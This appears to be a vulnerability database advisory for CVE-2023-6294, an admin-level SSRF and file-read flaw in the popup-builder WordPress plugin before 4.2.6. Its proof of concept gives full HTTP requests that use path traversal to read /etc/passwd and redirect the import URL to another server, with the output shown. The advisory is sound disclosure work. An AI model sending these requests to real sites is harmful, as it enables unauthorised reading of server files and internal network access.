WordPress Plugin Vulnerabilities

popup-builder < 4.2.6 - Admin+ SSRF & File Read

Description

The plugin does not validate a parameter before making a request to it, which could allow users with the administrator role to perform SSRF attack in Multisite WordPress configurations.

Proof of Concept

1. Create a multi-site wordpress setup, i.e. using docker-containers, and setup a second "site" with a separate administrator (without super-admin/network-admin rights).
2. Install the popup-builder plugin and activate it for the network
3. Login as said new administrator to the separate site (here: "site2" at "/site2/").
4. In the admin dashboard, navigate to Popup Builder -> Add New and add a new dummy Subscription
5. Navigate to All Subscribers -> Import. Choose the dummy subscription and enter any text in the File-Field.
6. Intercept the HTTP request issued by submitting the import form, which will include a valid nonce.
7. Change the parameter "importListURL" to "../../../../../../../../../../../../../../../../etc/passwd":

POST /site2/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 156
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: [cookie]
Connection: close

action=sgpb_import_subscribers&nonce=7ab37e2ddd&popupSubscriptionList=8&importListURL=../../../../../../../../../../../../../../../../etc/passwd&beforeSend=

This will output the first line of /etc/passwd in the response:

<div class="subFormItem__title">
	root:x:0:0:root:/root:/bin/bash				
</div>

8. Alternatively, "importURL" can be set to any URL allowing for SSRF, i.e. "importListURL=http://localhost:1337" with a "python -m http.server 1337" serving a "hacked.txt":

POST /site2/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 130
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: [Cookies]
Connection: close

action=sgpb_import_subscribers&nonce=7ab37e2ddd&popupSubscriptionList=8&importListURL=http://localhost:1337/hacked.txt&beforeSend=

Response:

<div class="subFormItem__title">
	Hacked			
</div>

Output from python:

root@6bd896f15815:/var/www/html# python3 -m http.server --directory /tmp 1337       
Serving HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ...
127.0.0.1 - - [21/Nov/2023 15:05:01] "GET /hacked.txt HTTP/1.1" 200 -

Affects Plugins

Plugin icon
popup-builder
Fixed in 4.2.6

References

CVE
CVE-2023-6294

Miscellaneous

Original Researcher
Sebastian Neef
Submitter
Sebastian Neef
Submitter website
https://0day.work
Verified
Yes
WPVDB ID
eaeb5706-b19c-4266-b7df-889558ee2614

Timeline

Publicly Published
2024-01-17 (about 3 months ago)
Added
2024-01-17 (about 3 months ago)
Last Updated
2024-01-17 (about 3 months ago)

Other

Published
Title
Published
2017-06-05
Title
Crelly Slider <= 1.1.1 - Multiple Unspecified Vulnerabilities
Published
2018-12-04
Title
Arigato Autoresponder and Newsletter < 2.5.2 - Authenticated Blind SQL Injection & Multiple XSS
Published
2019-09-08
Title
Selio - Real Estate Directory <= 1.1 - SQL Injection & Persistent XSS
Published
2015-07-11
Title
FileDownload <= 1.4 - Multiple Issues
Published
2015-05-25
Title
WordPress Landing Pages <= 1.8.4 - XSS & SQL Injection